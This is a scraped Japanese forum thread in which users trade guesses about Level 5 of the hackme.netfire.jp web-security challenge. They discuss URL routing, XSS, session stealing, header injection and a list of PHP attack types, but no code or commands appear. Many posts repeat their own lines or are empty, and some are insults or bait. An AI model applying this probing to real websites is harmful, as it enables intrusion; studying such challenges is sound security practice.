346 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:49:13.34
lv5がまったくわからん
PUT,DELETEやらなんやら
enctypeのmime錯覚やらなんやら
色々してるのに全く以て駄目
レベル上がりすぎ!
中の人はヒントよこせー!
PUT,DELETEやらなんやら
enctypeのmime錯覚やらなんやら
色々してるのに全く以て駄目
レベル上がりすぎ!
中の人はヒントよこせー!
347 :名無しさん@お腹いっぱい。:2011/02/26(土) 05:03:58.35
http://hackme.netfire.jp/Lv5/login のページで base 指定なしで
<link rel="stylesheet" type="text/css" href="/css/global_base.css"/>
が書いてあり、こいつが
http://hackme.netfire.jp/css/global_base.css
になっている。
だから、
http://hackme.netfire.jp/Lv5
まででよく、その後ろはパラメータ扱いだな。
<link rel="stylesheet" type="text/css" href="/css/global_base.css"/>
が書いてあり、こいつが
http://hackme.netfire.jp/css/global_base.css
になっている。
だから、
http://hackme.netfire.jp/Lv5
まででよく、その後ろはパラメータ扱いだな。
348 :名無しさん@お腹いっぱい。:2011/02/26(土) 05:05:16.87
349 :名無しさん@お腹いっぱい。:2011/02/26(土) 05:07:11.55
何をどう勘違いしたかしらんが、CSSは各レベル共通だよ。
350 :名無しさん@お腹いっぱい。:2011/02/26(土) 05:14:40.03
>>347
「だから」の意味がわからん
実際http://hackme.netfire.jp/Lv5では404だし、、、
http://hackme.netfire.jp/Lv5/index/?manko
とかなら通るけど
「だから」の意味がわからん
実際http://hackme.netfire.jp/Lv5では404だし、、、
http://hackme.netfire.jp/Lv5/index/?manko
とかなら通るけど
351 :名無しさん@お腹いっぱい。:2011/02/26(土) 05:39:39.33
横からだがそういうのは違うんだって
restfulな設計だそういうふうになるわけ
http://hackme.netfire.jp/Lv5
と
http://hackme.netfire.jp/Lv5/
の違いは
前者はファイルを探し、後者はLv5以下のコントローラ(indexとかね)を探す
詳しく言うと
ファイルを探してもない↓
同ディレクトリのコントローラも無い↓
無い無いばっかじゃ意味がなーいだから404
もしコントローラが見つかってもアクション(indexとかlogin)がみつかんないときは404(Webサービスによっては標準のアクションを表示する事もある)
だからそんなところを追ってもなーんの意味もないわけ
lv5やるからには一般的な基礎知識は持ち合わせとけよ…
restfulな設計だそういうふうになるわけ
http://hackme.netfire.jp/Lv5
と
http://hackme.netfire.jp/Lv5/
の違いは
前者はファイルを探し、後者はLv5以下のコントローラ(indexとかね)を探す
詳しく言うと
ファイルを探してもない↓
同ディレクトリのコントローラも無い↓
無い無いばっかじゃ意味がなーいだから404
もしコントローラが見つかってもアクション(indexとかlogin)がみつかんないときは404(Webサービスによっては標準のアクションを表示する事もある)
だからそんなところを追ってもなーんの意味もないわけ
lv5やるからには一般的な基礎知識は持ち合わせとけよ…
352 :名無しさん@お腹いっぱい。:2011/02/26(土) 05:53:08.25
>>351
何を当たり前のことを偉そうに言っているわりには
論点を勘違いしている?
Lv1-4/login/は通らないのに
Lv5/login/は通るのはなんでかな?って話でしょ。
この違いを追ってもなーんの意味もないとは何故言い切れる?
何を当たり前のことを偉そうに言っているわりには
論点を勘違いしている?
Lv1-4/login/は通らないのに
Lv5/login/は通るのはなんでかな?って話でしょ。
この違いを追ってもなーんの意味もないとは何故言い切れる?
353 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:00:16.04
>>352
あんたさー
mvc系アプリの一つでもつくったことあんの?
その様子からして全くないだろ
Lv5は実ディレクトリ又はコントローラアクションなわけ
意味わかる?わかんねぇだろうなぁー
ディレクトリが違えばコールされるコントローラは違う
アクションが違えばコール可能なコンテキストが違う
ここまでいって無駄な理由がわからないんなら
お前は今までのレベルをチーとしてきたチーと野郎だっつーこった
あんたさー
mvc系アプリの一つでもつくったことあんの?
その様子からして全くないだろ
Lv5は実ディレクトリ又はコントローラアクションなわけ
意味わかる?わかんねぇだろうなぁー
ディレクトリが違えばコールされるコントローラは違う
アクションが違えばコール可能なコンテキストが違う
ここまでいって無駄な理由がわからないんなら
お前は今までのレベルをチーとしてきたチーと野郎だっつーこった
354 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:02:42.85
ここまで俺の自演
355 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:02:56.32
升野郎:(ギクッ)
356 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:10:19.61
つまりLv4以前とは異なるフレームワークで作られていると?
357 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:10:33.49
>>353
〜アクションが違えばコール可能なコンテキストが違う」
までは理解できてると思うけど、そこから考えるのが
無駄な理由はわからない。ヒマだったら教えて欲しい。
mvc系アプリつくったことはない、というかアプリなんか
つくったことないwプログラマじゃないので。
でも今バイト先で管理してるサーバで動いてるアプリは
mvc系って言うんだと思う。
チートは4だけした。
〜アクションが違えばコール可能なコンテキストが違う」
までは理解できてると思うけど、そこから考えるのが
無駄な理由はわからない。ヒマだったら教えて欲しい。
mvc系アプリつくったことはない、というかアプリなんか
つくったことないwプログラマじゃないので。
でも今バイト先で管理してるサーバで動いてるアプリは
mvc系って言うんだと思う。
チートは4だけした。
358 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:16:36.51
>>351,353必死すぎワロタ
359 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:17:55.92
↑必死なのはバイトの君じゃね?w
360 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:18:47.70
↑必死なのは無職の俺だけど?
361 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:22:57.59
今時、バイトに管理させてる鯖とかあんの?
それそのものが脆弱性じゃね?
それそのものが脆弱性じゃね?
362 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:31:40.10
>>361
hackmeやってバイト先のアプリが
脆弱性のかたまりだとわかった
でも、別に不特定多数に公開されてる
わけではないので、多分あまり問題ない。
おれ、最初サーバ管理任されたとき
apacheもphpも聞いたこともなかったよ(爆
hackmeやってバイト先のアプリが
脆弱性のかたまりだとわかった
でも、別に不特定多数に公開されてる
わけではないので、多分あまり問題ない。
おれ、最初サーバ管理任されたとき
apacheもphpも聞いたこともなかったよ(爆
363 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:33:39.88
そこら辺しっかりしてればいろんな所から顧客情報流出しないって
バイトが管理してるかしてないかは知らんけどどこもぬるいのは確かだろ
バイトが管理してるかしてないかは知らんけどどこもぬるいのは確かだろ
364 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:38:49.34
URLマッピングしてるだけだから、意味ないんじゃね
そもそも当たり前のことと言いながらフレームワーク触ったことないのか
そもそも当たり前のことと言いながらフレームワーク触ったことないのか
365 :名無しさん@お腹いっぱい。:2011/02/26(土) 06:48:50.88
>>364
なんで伝わらないのだろう?
IT素人に近い俺が完全に勘違いしてるのかな?
「URLマッピングの法則がLv5だけ
違うことになにか解法への糸口があるのでは
ないのだろうか」という話なんだけど。
それでも無意味だよ、というのなら普通に
理由を教えていただきたいんですけど、、、
後学のために
なんで伝わらないのだろう?
IT素人に近い俺が完全に勘違いしてるのかな?
「URLマッピングの法則がLv5だけ
違うことになにか解法への糸口があるのでは
ないのだろうか」という話なんだけど。
それでも無意味だよ、というのなら普通に
理由を教えていただきたいんですけど、、、
後学のために
366 :名無しさん@お腹いっぱい。:2011/02/26(土) 07:04:10.30
法則は別に今までと一緒じゃん
367 :名無しさん@お腹いっぱい。:2011/02/26(土) 07:37:24.39
いままで404だったURLでアクセスできるようになってるんだから
何かしら意味があるんじゃないかと考えるのは当たり前だろ
何かしら意味があるんじゃないかと考えるのは当たり前だろ
368 :名無しさん@お腹いっぱい。:2011/02/26(土) 07:40:22.40
どうみてもポリシーは一緒です
何が違うんだよ
何が違うんだよ
369 :名無しさん@お腹いっぱい。:2011/02/26(土) 07:48:49.76
どうみても動作が違うだろアホか
370 :名無しさん@お腹いっぱい。:2011/02/26(土) 07:50:30.34
一緒だろボケ
371 :名無しさん@お腹いっぱい。:2011/02/26(土) 07:56:06.44
Lv.5全然解けない…
Lv.4みたいに、条件を満たしてればクリアできるのか、
Lv.3みたいに、ユーザー名とパスワードがあってなきゃクリアできないのか、
それだけは教えてほしいな…
Lv.4みたいに、条件を満たしてればクリアできるのか、
Lv.3みたいに、ユーザー名とパスワードがあってなきゃクリアできないのか、
それだけは教えてほしいな…
372 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:02:20.14
>>371
多分後者
多分後者
373 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:05:53.72
dotdisterの様子からすると意外な方法かもな
374 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:19:12.04
ブルートフォースしたくなるなこれは…
375 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:32:14.16
なんで揉めてんだww
今のところ判明している唯一のLv5固有動作は以下の通り。
/Lv5/login でも /Lv5/login/ でもページが表示される。
(/Lv1/login は動くけど、/Lv1/login/ は動かない)
と言うわけで、俺も >>365 が知りたい。
今のところ判明している唯一のLv5固有動作は以下の通り。
/Lv5/login でも /Lv5/login/ でもページが表示される。
(/Lv1/login は動くけど、/Lv1/login/ は動かない)
と言うわけで、俺も >>365 が知りたい。
376 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:35:38.98
だからそれはフレームワークの基礎的な動作だろks
htmlから出直せ!
htmlから出直せ!
377 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:35:41.54
もう一つネタ投下。中の人曰く。
madogiwa
Hackmeの実装ってTurboGearsかな? エラーメッセージに同じのがあった。 http://turbogears.org/
passa
@madogiwa Pylonsですよ。ValidatorがFormEncode。
これが、ヒントの投下であるのかは分からんが。
madogiwa
Hackmeの実装ってTurboGearsかな? エラーメッセージに同じのがあった。 http://turbogears.org/
passa
@madogiwa Pylonsですよ。ValidatorがFormEncode。
これが、ヒントの投下であるのかは分からんが。
378 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:42:55.08
>>376
フレームワークの基本的な動作だと仮定するならば。
Lv5 では他のレベルと「基本的な動作」の異なるフレームワークを使用している事になる。
なぜなら、他のレベルでは /Lv1/login/ が動かないから。
また、他のレベルでは、それまでのレベルと異なる部分に攻略の大きなヒントが隠されていた。
(e.g. Lv3 は他のレベルとURLのパターンが異なる)
したがって、/Lv5/login/ でも動作すると言う事実は、攻略のヒントなのではないかと言う事なんだ。
フレームワークの基本的な動作だと仮定するならば。
Lv5 では他のレベルと「基本的な動作」の異なるフレームワークを使用している事になる。
なぜなら、他のレベルでは /Lv1/login/ が動かないから。
また、他のレベルでは、それまでのレベルと異なる部分に攻略の大きなヒントが隠されていた。
(e.g. Lv3 は他のレベルとURLのパターンが異なる)
したがって、/Lv5/login/ でも動作すると言う事実は、攻略のヒントなのではないかと言う事なんだ。
379 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:45:29.95
だから基礎的な動作ってのはよく分かったから
Lv4まで末尾に/が来るとダメでLv5だけあっても大丈夫
という事象が手がかりにならないって理由を分かりやすく教えてくれって言ってるんだ。
Lv4まで末尾に/が来るとダメでLv5だけあっても大丈夫
という事象が手がかりにならないって理由を分かりやすく教えてくれって言ってるんだ。
380 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:52:53.46
Lv4/と末尾に/あっても表示されるんだけど
381 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:57:18.72
382 :名無しさん@お腹いっぱい。:2011/02/26(土) 08:57:40.63
LV4/login/ な
383 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:04:38.01
自分の指摘が見当違いな事を言ってると気付いて引っ込みがつかなくなったんだろ
更に上から目線でksとか言い出す馬鹿だから相手にしないほうがいい
更に上から目線でksとか言い出す馬鹿だから相手にしないほうがいい
384 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:06:17.21
この動きから、app.yaml がどう書かれてるかとか予想するのは割と有意義な気がするけどな
385 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:09:16.90
ID分からないんだから引っ込みつかなくなったら素知らぬ顔してればいいのになw
そんなのもわからないくらい顔真っ赤なのか
そんなのもわからないくらい顔真っ赤なのか
386 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:10:49.47
どっちにしろお前らがもめてる内容じゃIDもPASSも知る事ができないよ
真面目にやろうぜ
真面目にやろうぜ
387 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:12:21.03
/Lv6/ に続いて、/Lv5/next/ も /Lv5/ に転送される模様。
これは転送なんで、/Lv5/login/ の問題とちょっと違うけど一応追記。
これは転送なんで、/Lv5/login/ の問題とちょっと違うけど一応追記。
388 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:14:45.25
クリア方法w
ネタバレだから見たくないやつは閉じろ
http://hackme.netfire.jp/Lv1/next
↓
http://hackme.netfire.jp/Lv2/next
↓
http://hackme.netfire.jp/Lv3/next
↓
http://hackme.netfire.jp/Lv4/next
↓
もうわかるなw期待して良いぞ。
これは落とし穴だわ〜。
むかつく。
ネタバレだから見たくないやつは閉じろ
http://hackme.netfire.jp/Lv1/next
↓
http://hackme.netfire.jp/Lv2/next
↓
http://hackme.netfire.jp/Lv3/next
↓
http://hackme.netfire.jp/Lv4/next
↓
もうわかるなw期待して良いぞ。
これは落とし穴だわ〜。
むかつく。
389 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:17:20.12
はいはい
390 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:18:20.61
Lv5 不正文字突っ込むと入力したものがそのまま返ってきて、英数字アンダースコアだと空白で返ってくる程度しかわからね。
391 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:18:21.71
>>388
出来ねえぞ! ビビらせんなコラ!w
出来ねえぞ! ビビらせんなコラ!w
392 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:18:32.54
基本的な動きを理解してない奴がいるな
これがセキュ板のレベルかよw
これがセキュ板のレベルかよw
393 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:19:32.48
いろいろと釣られて来た俺だか
こればかりは釣られなかった
こればかりは釣られなかった
394 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:20:39.98
Lv5/<ここ>←にbf辞書アタックしてる奴がいるときいて
395 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:32:22.74
今Lv5攻略の流れですいませんが
Lv4のsessionを盗んだのですがそれをどう使えばいいのかわかりません。
cookieのsessionを書き換えたら最初からになったし。。。
誰か教えてください。
Lv4のsessionを盗んだのですがそれをどう使えばいいのかわかりません。
cookieのsessionを書き換えたら最初からになったし。。。
誰か教えてください。
396 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:33:31.87
>>395
お前の書き換えたのはhackmeの垢セッションだ
お前の書き換えたのはhackmeの垢セッションだ
397 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:33:54.97
398 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:36:39.30
>>395
俺と同じことやった奴が居るwww
俺と同じことやった奴が居るwww
399 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:37:57.36
400 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:38:11.86
>>397
新規ならどんな名前で追加したらいいんですか?
新規ならどんな名前で追加したらいいんですか?
401 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:38:48.26
流石にそれはこのスレでは教えられない
hackmeの中の人が怒るからな
hackmeの中の人が怒るからな
402 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:39:23.80
>>401
分かりました。
分かりました。
403 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:40:04.90
ここで3DSの話で出たけど買ったやついる?
俺はまだ買ってないが急げば間に合うかも
俺はまだ買ってないが急げば間に合うかも
404 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:41:14.79
405 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:43:50.78
406 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:44:32.27
はちまから来た奴って何でこうも節操がないわけ?
407 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:48:37.17
>>406
はちまと聞いて一瞬わかんなかったけど
はちま=スレまとめサイトの総称
で2chでは通ってるの?
それとも、リアル指定?
それとも、八幡宮の略称?
※ネタではなく、マジレスです。回答お願いします。
はちまと聞いて一瞬わかんなかったけど
はちま=スレまとめサイトの総称
で2chでは通ってるの?
それとも、リアル指定?
それとも、八幡宮の略称?
※ネタではなく、マジレスです。回答お願いします。
408 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:48:45.00
できました!
さっき間違がえて最後にidをつけてしまったのが原因でした!
回答をくださった皆様、ありがとうございました!
さっき間違がえて最後にidをつけてしまったのが原因でした!
回答をくださった皆様、ありがとうございました!
409 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:49:33.81
こんなんでクリアしても嬉しいのかよ・・・って前スレに答えが書いてあったからなぁ
410 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:49:56.98
こうしてLv4に値する技術のない人が勘違いして増えていくのであった…
411 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:51:19.52
>>409
lv4は先行組でも、クリアして喜んでる人いない感じだったけどなw
lv4は先行組でも、クリアして喜んでる人いない感じだったけどなw
412 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:52:16.16
それでlv5最先端組は今は何をしてるわけ?
413 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:52:53.06
「にょき」が全てだったからな
414 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:54:05.43
415 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:56:11.78
416 :名無しさん@お腹いっぱい。:2011/02/26(土) 09:59:22.43
>>415
言ってることが意味不明なんだが
言ってることが意味不明なんだが
417 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:02:13.42
lv6以降は問題募集しているんだよ
418 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:13:52.36
飽きてきたのでcookieをみていた。
気付いたこと↓
・楽天とツイッターのクッキーにipが入っている。
・ツイッターの_twitter_sessはリアルタイムで代わっていく。
おまえらこういった無駄知識がクリアにつながるんだよ。
気付いたこと↓
・楽天とツイッターのクッキーにipが入っている。
・ツイッターの_twitter_sessはリアルタイムで代わっていく。
おまえらこういった無駄知識がクリアにつながるんだよ。
419 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:15:04.45
どーでもいい
ついでにtwitterはセッション生成用の鯖持ってるってのも知識につけくわえとけks
ついでにtwitterはセッション生成用の鯖持ってるってのも知識につけくわえとけks
420 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:17:10.17
まあまあ。どーでも良いところからヒントが見えてくる事もあるし。
どんどん書いていこうぜ。
どんどん書いていこうぜ。
421 :名無しさん@お腹いっぱい:2011/02/26(土) 10:19:49.03
住民みんなで一斉BANしないか?w
422 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:20:59.27
じゃあ俺もどうでもいいことをひとつ
lv4クリアのためにXSSのコード探しているときに
lv5に使えそうなコードを見かけたが忘れた。
今ではもう履歴の山の中
lv4クリアのためにXSSのコード探しているときに
lv5に使えそうなコードを見かけたが忘れた。
今ではもう履歴の山の中
423 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:29:32.21
おまいらがんばれ!
俺はもうキャサリンして遊ぶわ
俺はもうキャサリンして遊ぶわ
424 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:29:44.75
まるで見えないけどヌルバイト系の脆弱性なのかなあ
425 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:33:32.59
twitterとfacebookをハクして、各レベルに貼ってあるwidgetの設定を見ればいいじゃん
426 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:41:53.00
うんそうだね
Lv1の答えはそこだね
Lv1の答えはそこだね
427 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:43:04.12
PHPで脆弱性と言えば、Lv4までで出たのも含めると・・・
1:XSS
2:Script Insertion
3:SQL injection
4:CSRF
5:ヌルバイト攻撃
6:Directory Traversa
7:変数汚染攻撃
8:HTTPレスポンス分割攻撃
9:インクルード攻撃
10:eval利用攻撃
11:外部コマンド実行攻撃
12:ファイルアップロード攻撃
13:セッションハイジャック
14:スパムメール踏み台攻撃
ぐらいだよな・・・
この中に、Lv5の答えがあるのか・・・
Lv5は、反応がなくて検討がつかんな・・・
1:XSS
2:Script Insertion
3:SQL injection
4:CSRF
5:ヌルバイト攻撃
6:Directory Traversa
7:変数汚染攻撃
8:HTTPレスポンス分割攻撃
9:インクルード攻撃
10:eval利用攻撃
11:外部コマンド実行攻撃
12:ファイルアップロード攻撃
13:セッションハイジャック
14:スパムメール踏み台攻撃
ぐらいだよな・・・
この中に、Lv5の答えがあるのか・・・
Lv5は、反応がなくて検討がつかんな・・・
428 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:43:44.79
>>427
俺、そのリストを見ただけであんたが何の本から引用したか一発でわかったわw
俺、そのリストを見ただけであんたが何の本から引用したか一発でわかったわw
429 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:45:07.44
>>424
試した。何もおきない。
こいつはググッて出てくる単品攻撃じゃなくてなにか違うものだ。
かなりの攻撃がググられ、試されているはずだから
検索で出てくるような攻撃方法ではないな。
おそらくかなりの発想力がいる。
で、発想できればあとは何も面倒ではない方法だろう。
俺の予想だと昼までにもう一人クリアするな。
試した。何もおきない。
こいつはググッて出てくる単品攻撃じゃなくてなにか違うものだ。
かなりの攻撃がググられ、試されているはずだから
検索で出てくるような攻撃方法ではないな。
おそらくかなりの発想力がいる。
で、発想できればあとは何も面倒ではない方法だろう。
俺の予想だと昼までにもう一人クリアするな。
430 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:47:31.45
フレームワーク固有の脆弱性だったら萎えるな
言語固有とかも萎え萎え
言語固有とかも萎え萎え
431 :名無しさん@お腹いっぱい。:2011/02/26(土) 10:47:36.91
432 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:00:50.73
433 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:06:32.48
なんか文字化けしちゃった
/Lv5/next/ → /Lv6/ → /Lv5/
/Lv5/next/ → /Lv6/ → /Lv5/
434 :名無しさん@お腹いっぱい:2011/02/26(土) 11:08:03.69
lv4おしえて
435 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:08:52.04
誰でもわかってる事に2レスもしやがって…
436 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:09:46.02
>>434
もう答え出てる
もう答え出てる
437 :名無しさん@お腹いっぱい:2011/02/26(土) 11:14:57.00
>>434
どこですか?
どこですか?
438 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:16:43.54
それすら調べられないならやる意味ないよ
439 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:19:48.99
あとsageろよks
440 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:20:54.20
昨日の深夜からカルシウム不足のやつが紛れてるな
441 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:22:36.05
いまさらlv4以下の話は雑談よりうざい。
442 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:24:35.40
443 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:24:59.32
語尾にksの奴が一番うざいけど分かっててやってるアホだからな
444 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:26:03.50
↑ワロスks
445 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:27:02.18
>>1はネットファイアの人か。
446 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:34:41.64
lv5はまたXSSの脆弱性があるね。
これがヒントだと思う。
これがヒントだと思う。
447 :名無しさん@お腹いっぱい:2011/02/26(土) 11:36:33.43
lv4教えて
448 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:37:31.14
前スレ見ろよ
過去ログ見れないならググれ
過去ログ見れないならググれ
449 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:39:59.25
まず服を脱ぎます
450 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:41:04.82
きょう射精3回目
451 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:43:46.20
Lv5XSSの脆弱性つついてるうちにフレームワーク断定した!
このフレームワークのバージョン探って脆弱性つけばクリアかも
このフレームワークのバージョン探って脆弱性つけばクリアかも
452 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:44:15.84
LV3おしえて Xまではわかた
453 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:45:23.65
>>446
マジで? スクリプトインジェクション可能ってこと?
マジで? スクリプトインジェクション可能ってこと?
454 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:46:32.20
>>428
同じくww でも、この本良いよね。
同じくww でも、この本良いよね。
455 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:47:18.96
デマ
フレームワークは既に断定済み
フレームワークは既に断定済み
456 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:47:51.01
457 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:48:28.11
お前らやってないことがあるぞw
自分のIDとPASSでlv5クリアできたwwwwww
自分のIDとPASSでlv5クリアできたwwwwww
前スレ見ても書いてなくないスか?
459 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:49:23.20
マジだw
名前載ったぞっ!
名前載ったぞっ!
460 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:49:54.96
ちょろい
461 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:50:28.06
>>459
さすがに、それは無いwww
さすがに、それは無いwww
462 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:50:31.35
昼頃になってlv5情報の質が一気に落ちたな
463 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:50:37.38
一人ずっと可哀相な奴がいるな
464 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:50:46.85
LV3のかいとうーw
465 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:51:39.58
466 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:52:13.21
googleアカウントでログイン
467 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:52:40.02
結局、Lv4が一番難しかったね。
468 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:54:07.27
lv5クリアしてからいえよw
469 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:54:38.23
SQLインジェクション、ディレクトリトラバーサル、XSS、セッションハイジャックと技術系の
脆弱性のメジャーどころは一通り出た感があるよな。
あと残ってるとしたら、HTTPヘッダインジェクションくらい?
パターンとしては・・・
1.Lv5 も技術系で攻めていける
2.技術系と見せかけて実はソーシャルハック系、または発想で勝負系
仮に2だとした場合、ヒントになりそうなのは中の人の、過去のTwitter発言とかか。
脆弱性のメジャーどころは一通り出た感があるよな。
あと残ってるとしたら、HTTPヘッダインジェクションくらい?
パターンとしては・・・
1.Lv5 も技術系で攻めていける
2.技術系と見せかけて実はソーシャルハック系、または発想で勝負系
仮に2だとした場合、ヒントになりそうなのは中の人の、過去のTwitter発言とかか。
lv4教えて
471 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:55:58.10
セキュリティ製品売ってる中の人もとけてないんだろう?
なら普通のやり方じゃ無理な気がする
なら普通のやり方じゃ無理な気がする
472 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:56:31.19
HTTPヘッダインジェクションは表示が変になっておしまい。
これはホスト自体の仕様でlv5には関係なさそう。
これはホスト自体の仕様でlv5には関係なさそう。
473 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:56:53.90
>>468
いや、だからクリアしたってw
いや、だからクリアしたってw
474 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:58:19.53
こんなスレでホラ吹いてリアルでは・・・
475 :名無しさん@お腹いっぱい。:2011/02/26(土) 11:58:34.22
>>473
Lv4クリアしたいなら前のスレいけks
Lv4クリアしたいなら前のスレいけks
476 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:01:11.79
477 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:03:37.65
LV5のヒントがつかめてきた
HTTPヘッダ見てみろ
HTTPヘッダ見てみろ
478 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:03:39.55
>>471
日本語でおk
日本語でおk
479 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:04:53.28
>>477
他レベルと変わったとこなくない?
他レベルと変わったとこなくない?
480 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:08:10.88
LV3おしえて Xわかたそこから?
481 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:08:32.74
>>479
ブラウザの設定値をそのままHTTPの応答に使っている箇所がある
ブラウザの設定値をそのままHTTPの応答に使っている箇所がある
482 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:08:54.68
>>479
変わらないよねえ。
変わらないよねえ。
483 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:10:08.15
>>481
具体的に。
具体的に。
484 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:10:40.28
得意げに見つけたとか言ってるけど、突破してないんじゃあ・・・
485 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:13:27.36
まあ、ランキング見ればすぐに分かることだしな。
486 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:15:29.61
http://www.ipa.go.jp/security/vuln/documents/website_security.pdf
このpdfの目次を見てみると順番的にLV5はHTTPヘッダインジェクションっぽいよね
このpdfの目次を見てみると順番的にLV5はHTTPヘッダインジェクションっぽいよね
487 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:16:34.67
488 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:22:08.57
>>477 は釣り
489 :名無しさん@お腹いっぱい:2011/02/26(土) 12:23:12.27
490 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:26:50.46
通報した
491 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:27:25.79
同じく通報した
492 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:27:29.91
消されるぞ・・・
>>489
「アクセスが拒否されました」ってなったぞ。
「アクセスが拒否されました」ってなったぞ。
494 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:29:29.36
タダでさえ意味もわからず飛んできた
PC初心者が居るというのに。
PC初心者が居るというのに。
